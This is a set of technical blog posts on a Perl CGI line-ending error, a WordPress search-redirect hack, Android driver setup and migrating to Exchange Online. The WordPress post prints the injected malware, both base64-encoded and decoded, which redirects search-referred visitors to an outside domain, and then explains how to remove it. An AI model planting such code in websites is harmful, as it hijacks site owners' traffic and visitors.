No Such File or Directory: Exec of FILE Failed

I recently ran into the error “No Such File or Directory: Exec of FILE Failed” when trying to update a Perl script on a server running Apache.
 
The actual error message looked more like this.

No such file or directory: exec of 'script.cgi' failed
Premature end of script headers: script.cgi

 
A long story short, it turns out that the issue was line endings. Windows uses a standard CR+LF (Carriage Return + Line Feed) while Unix uses LF (Line Feed). We spotted this, after a lot of trying to figure what was going on, by running a “cat script.cgi” command on the server. When the content was displayed, every line was ended with a “^W”.
 
When using an application like WinSCP to copy the files to the server, the line endings are often converted during the copy process. But if you use an automated release process, or other process that doesn’t have the same features, you must manually convert the files to using Unix style line endings.
 
I converted the files using Notepad++. There are End-of-Line (EOL) conversion utilities built in. They can be accessed by going to Edit -> EOL Conversion after you have opened the offending file.
 
For some more information on how to convert the line endings in Unix, check out perltricks.com.
 
Once the line endings where converted from Windows to Unix style, everything worked as expected!
 
For some more information on line endings, check out Wikipedia, http://en.wikipedia.org/wiki/Newline.

WordPress Search Redirect Hijack

I recently had the opportunity to work with a friend on fixing a WordPress installation (version 3.5.1) that every time the page was accessed via a search engine it would redirect to a generic site, in this case http://kmlps.mrslove.com/.

This hijack consisted of PHP code being inserted into the various WordPress and plugin PHP files.

Here is the code that was injected into all of the pages.

<?php
eval(base64_decode(CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio));
?>

This is simply a base64 encoded block of PHP code that is decoded then evaluated by the PHP processor when the page loads. When you decode the text, you can see exactly what the code does.

<?php
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
	$referer=$_SERVER['HTTP_REFERER'];
	$uag=$_SERVER['HTTP_USER_AGENT'];
	if ($uag) {
		if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
			if (stristr($referer,"yahoo") 
				or stristr($referer,"bing") 
				or stristr($referer,"rambler") 
				or stristr($referer,"gogo") 
				or stristr($referer,"live.com")
				or stristr($referer,"aport") 
				or stristr($referer,"nigma") 
				or stristr($referer,"webalta") 
				or stristr($referer,"begun.ru") 
				or stristr($referer,"stumbleupon.com") 
				or stristr($referer,"bit.ly") 
				or stristr($referer,"tinyurl.com") 
				or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) 
				or preg_match ("/google\.(.*?)\/url\?sa/",$referer) 
				or stristr($referer,"myspace.com") 
				or stristr($referer,"facebook.com") 
				or stristr($referer,"aol.com")) {
				if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
					header("Location: http://kmlps.mrslove.com/");
					exit();
				}
			}
		}
	}
}
?>

As you can see with the code, if the HTTP Referrer is any of a slew of websites/search engines, then the code will redirect the user to the specific location using a 301 redirect. This allows a user to access the site directly, but not through many search engines. This will definitely cause a lot of problems for a website that gets most of its traffic from search engines.

The Fix

I was able to fix the issue by copying all of the WordPress files off of the server, and removing the code from each of the files.

NOTE: Windows Defender picked up the bad code in the PHP files and quarantined them. If this happens for you, you will have to pull the files out of quarantine before you can edit them.

After you have the files copied over and are able to edit them, it’s simply a matter of removing the bad code. Once the code is removed, re-upload them to the server. This is a bit laborious, but it definitely gets the job done. Just make sure you don’t miss any files, otherwise the problem will persist.

One of the better, and probably more thorough way to clean up the issue would be to upgrade/re-install the version of WordPress that you are using. This can be done through the built in WordPress Updates processes. The update will replace the bad files with clean versions. As always, make sure you make a backup before doing any major upgrades, etc.

Another option would be to restore the files from a backup. Since the database didn’t seem to be affected, simply performing a content restore from a backup would also have corrected the issue.

Bottom line, you should always make sure you are staying on top of updates for content management systems like WordPress, Joomla, etc. And you should make sure that your FTP accounts, etc. all have solid passwords. It will save you a lot of headache, and possibly a lot of lost business down the road.

Android A13-MID Driver Installation

If you have ever used a “generic” Android device for development, you have probably had to go through the process of trying to find random Windows drivers or hacking your way through a bunch of hoops to get the device to work. The bottom line is that the Google USB drivers only support specific devices, and if you want to develop with cheaper (or other) devices, you have to do some monkeying around to make them work.

Here is what I have found as a simple way to get them to work (on Windows systems, specifically Windows 8.1)…

Step 1

Connect up your generic device and get the Hardware IDs. To get the Hardware ID, after connecting your device, Right click on This PC in a Folder window and click Manage. Select Device Manager and then open your Android device. It should have the yellow exclamation point next to it. From there, select the Details tab, and then Hardware IDs from the drop down list. You should see something that looks like USB\VID_18D1&PID_0003&MI_01. This is the Hardware ID that you will need, copy and save it.

Step 2

Open up the android_winusb.inf file located here, C:\Program Files (x86)\Android\android-sdk\extras\google\usb_driver. This file contains the driver device details, etc.

NOTE: You will have to open the file as Administrator to be able to save your changes.

Once you have the file opened you should scroll through and find the section titled [Google.NTx86] and [Google.NTamd64]. At the bottom of each of these sections you will need to add the following lines, these tell the system that the drivers support your hardware. You will want to change the Hardware IDs to match the ones you found in Step 1, if they are different.

;Generic
%SingleAdbInterface%        = USB_Install, USB\VID_18D1&PID_0003
%CompositeAdbInterface%     = USB_Install, USB\VID_18D1&PID_0003&MI_01

After you have that information added and the file saved you are ready to move on to the next step.

Step 3

In Windows 8/8.1 (and 7 if I remember correctly), the OS will only let you install signed drivers, and because we made changes to the driver files, they will no longer install. So to get around this we have to disable driver signature verification. In Windows 8/8.1, you can do this by following the information on this site, howtogeek.com.

Once you have disabled the signature verification, you can attach your device and update the drivers. To do this you go into Device Manager, Right click on the device and select Update Driver Software…. From the update driver window, select Browse my computer for driver software and then enter the path C:\Program Files (x86)\Android\android-sdk\extras\google\usb_driver. Then, click Next and the driver software should be installed, if everything in Steps 1 and 2 were completed correctly.

Now you should be able to see your device when you attempt to run a project from Eclipse and the device should show as an Android Device in Device Manager.

Exchange Online Connected Accounts

When I initially switched over to Exchange Online a couple of weeks ago, I was stoked for the “Connected Accounts” functionality that it offered. The idea of a consolidated inbox sounded too good to be true. Unfortunately that proved to be all too true. This isn’t a total bash on the feature, it’s just not something that really “works” for what I was trying to do with it (and hoped it would be able to do).

So first things first, here is what it does ok… It downloads e-mail from (up to 5) POP/IMAP accounts and puts that mail into your Exchange Inbox. It allows you to send messages “on behalf of” those connected accounts on systems that can handle it. In my trials, for actually sending mail from the connected accounts, Outlook and the Outlook Web Client that is provided were the only systems able to correctly use the connected accounts to send. iOS devices send from the default Exchange account when replying to a message, not the alternate address, and on top of that, you can’t even select the additional addresses as options to send from when creating a new message. So it pretty much doesn’t work at all in the case of iOS.

What it doesn’t do well (at all)… Is provide a transparent layer for multiple e-mail accounts. What I mean by that is that if you have two e-mail addresses, your main Exchange account, lets say user@domain.com and a connected account user@domain2.com; If you send an e-mail in Outlook from user@domain2.com, it will display to the receiver (depending on their mail client) basically saying the message was sent “on behalf of” user@domain.com. Here are some examples of how that looks in a few mail systems.

Outlook:


Gmail:


For someone like myself who is a consultant and has many e-mail addresses and doesn’t necessarily want clients to see e-mails coming from one address when they should be from another, it can be problematic. It can also make for unhappy employers, etc.

Gmail offers some ways around these issues, using “Send mail as” functionality that has a much cleaner implementation and actually allows you to use external SMTP servers to send mail. So no more “on behalf of” in your connected accounts messages. It also allows you to join up POP/IMAP accounts to download messages.

This leads to the logical progression of why didn’t I just use Gmail (and Google Apps) instead of Exchange Online? Well, for me, I like the other features of Exchange, like the Calendar, Contact syncing and just the overall experience of the Exchange System. Also, the overall integration with Outlook is quite nice. The Gmail experience might be up to par now, but in my past experiences, the actual Exchange integration just works better.

So, you might ask next, what did I decide to do? Well, it’s not really a work around, or even some other form of consolidation. What I ended up doing is adding all of my accounts individually to Outlook, on my iPhone and my iPad. And you guessed right, that means a lot of accounts. But, it does offer some benefits… the main one being total segregation of my e-mail accounts, no messages will ever be sent on behalf of another account, etc. In Outlook, utilizing the Favorites section for mail, it allows me to see all of my main inboxes in one place and doesn’t really take away much from the experience. I am one of those Outlook users that is used to using the “Folder List” view, but I’m quickly adapting to mostly using the “Mail” view.

Here is what my favorites list looks, you can see the 3 main inboxes for the accounts I use most frequently at the top.

The main up-in-the-air items that are yet to be determined is the performance hit that Outlook will take, it’s now checking multiple accounts instead of just one Exchange account. And what the impact will be on the battery life of my phone and other mobile devices. My guess is that both Outlook and the mobile devices will take a hit, but hopefully it won’t be too bad.

Hopefully, Microsoft will update the Connected Account functionality sometime sooner rather than later, I know it would make me very happy. But until then, this should get the job done!

What are your thoughts?

Some more information:

Exchange Online

Tired of having partial integration of e-mail, kind of working calendar and mediocre contact syncing? I sure was! So I decided to upgrade to Exchange Online. Hosted Exchange seemed to fit the bill for the basics that I was looking for, mainly better integration between devices. I often do work from a desktop with Outlook, from my Cell Phone, various laptops via Web Mail and an iPad. Being able to change a contact on one, and have all of the devices update, or create a calendar invite and have it go to everything was crucial and a huge time saver.

I reviewed various options out there, but for the price Exchange Online from Office 365, Microsoft, seemed to be the best bang for my buck, especially with the basic features that I was looking for.

The basic “features” for the generic Exchange Online Plan 1 are:

  • Users can retrieve email, calendars, and contacts from almost anywhere using their computer, browser, or phone.
  • 25 GB user mailboxes that integrate seamlessly with Outlook and can send attachments up to 25 MB.
  • Access to easy-to-use online management tools that let you administer user permissions and service settings and setup email on your domain.

Domains

For the trial Microsoft creates a testing domain for you, [domain name].onmicrosoft.com. You can use this domain for testing, etc. But adding your real domain is a quick and simple process. Basically it just requires adding a DNS TXT record to identify that you are the owner of the domain. Once you do that your domain will be verified and you can start to add accounts using the new domain as the primary e-mail address for users.

After your domain is added, you simply have to update your DNS settings to point your MX records to the Microsoft servers. They even provide you updated SPF records! Make sure you have added mailboxes, tested, and made a backup of your DNS before making any changes to your DNS!

Exchange Management

There is a pretty robust management system for Exchange, giving you easy web access to most things you could ever want to change (at least for my implementation).

Management is broken up into multiple categories, Users & Groups, Roles & Auditing, Mail Control and Phone & Voice. Under each of those categories you have access to specific tasks.

Users & Groups

You can access Mailboxes, Distribution Groups, External Contacts, and E-Mail Migration configurations under this group.

Roles & Auditing

You can access Administrator Roles, User Roles and Auditing options under this group.

Mail Control

You can access Rules, Domains and Protection, Retention Policies, Retention Tags, Journaling and Delivery Reports in this group.

From the Domains and Protection tab you also have access to Forefront Online Protection for Exchange (FOPE). This has some cool functionality and reporting features and gives you some really good control over your mail flow. Unfortunately I’m not too familiar with the inner workings of Forefront, so I won’t go into too much detail on that.

I did have some basic issues getting users added into FOPE. There is an issue with adding administrator accounts because of how the Single Sign-On process works. I had to open a support case with Microsoft to get more details on this, but its a quick process to get it fixed up.

The issue presents its self for Global Administrator accounts, if you access FOPE and don’t have an account already created you get access errors when trying to perform tasks and view your quarantine.

To fix the issue, Microsoft provided the following details:

Office 365 administrators cannot sign in to the Forefront Online Protection for Exchange (FOPE) Quarantine service to access mail quarantine:

To resolve this issue, use a second Office 365 administrator account to temporarily remove the Office 365 administrator role from the initial user account in the Office 365 portal, manually add the user account to the FOPE Administration Center, and then reassign the administrator role to the user account in Office 365. To do this, follow these steps:

  1. If you are not already signed in, sign in to the Office 365 portal by using Global administrator credentials. Do not sign in by using the Office 365 administrator account that is experiencing the issue.
  2. Check and remove the global administrator role from the user account in the Office 365 portal. To do this, follow these steps:
    1. In the Office 365 portal, click Admin, and then click Users in the left navigation pane.
    2. Click the global administrator account that you want to modify, and then click Settings.
    3. Note the value of the role assignment.
    4. Under Assign role, click No, and then click Save.
  3. Add the user account to the Users list in the FOPE Administration Center. To do this in the ECP, follow these steps:
    1. In the left navigation pane, click Roles & Auditing, and then click Configure IP safe listing, perimeter message tracing, and e-mail policies in the right pane.
    2. Click Administration, and then click Users.
    3. In the Tasks pane, click Add User.
    4. In the Add New User dialog box, enter the email address of the user account. Do not assign administrator permissions to this account.
    5. Click Save.

      Note If you cannot add the FOPE user account, contact technical support for help.

  4. Restore the administrator roles that you noted in step 2c and step 3e to the administrator account.


Note
To prevent this issue from occurring to other future administrator accounts, first add the user account as a standard FOPE user account in the FOPE Administration Center (see step 4), and then add the administrative permissions to the account in Office 365.

They also sent along the following documents as additional reference for accessing and supporting FOPE:

Users & Mailboxes

You have a basic UI for managing existing users and creating new users online, thre are also integration features such as Active Directory Synchronization and Single Sign-on. This is not a feature that I am using, but there are a lot of options for getting your company seamlessly integrated with Microsoft Online. More information on that here, http://onlinehelp.microsoft.com/en-us/office365-enterprises/ff652540.aspx.

From the user management pages, you can go in and directly manage users mailboxes. Setup contact information view mailbox size, etc.

  • General information – Name, Display Name, etc.
  • Mailbox Usage
  • Contact Information – Address, Phone Number, etc.
  • Organization Details – Title, Department, Company, Manager, Direct Reports
  • E-Mail Options – Primary E-Mail Address, Other E-Mail Addresses
  • Mailbox Settings – Mailbox Plan, Role Assignment Policy, Retention Policy
  • MailTip – MailTip to be displayed when people send e-mail to this mailbox.
  • Mailbox Features – Enable/disable extra features (Archiving, etc)
  • Phone & Void Features – Enable/disable voice features
  • Basically everything you would expect to have access to. The UI isn’t the most seamless, and there are some little bugs here and there, but overall it works really well and gets the job done!

    E-Mail Migration Process

    My e-mail migration process was super simple, basically I made a backup (as you always should before doing any major changes) to my existing outlook PST file. Then closed out of outlook, went into the mail settings via Control Panel , then created a new profile named “Santomieri Systems – Exchange”.

    This new profile, if you have your autodiscover DNS setup correctly, should link right up to Exchange Online and fill in all of your settings. And for me, that was pretty much it as far as setup goes.

    Then for mail import, you simply open up Outlook, Go to File > Options > Advanced > Export > then click on the Export button. Then select “Import from another program or file”. Then click Next, and select “Outlook Data File (.pst)” and then select your old Outlook PST file, and that’s about it! Your mail will load in and then be synced to Exchange (that may take a while depending on the amount of data and how fast your internet connection is).

    Also once you are all linked up to Outlook you get cool features like seeing your mail quote in Outlook, server processed rules, etc. Basically all of the great things about Exchange, at a bargain price!

    So to sum everything up, my migration to exchange online, for a couple users, took about a week. That included some basic testing and planning around moving everything that I needed to move, documenting outlook rules, re-evaluating folder structure, etc. Now that the move is done, I have everything working with my iPhone, iPad, laptops, desktops and web mail, and it is GREAT! I’m probably saving 1-2 hours a day just in going through e-mail alone!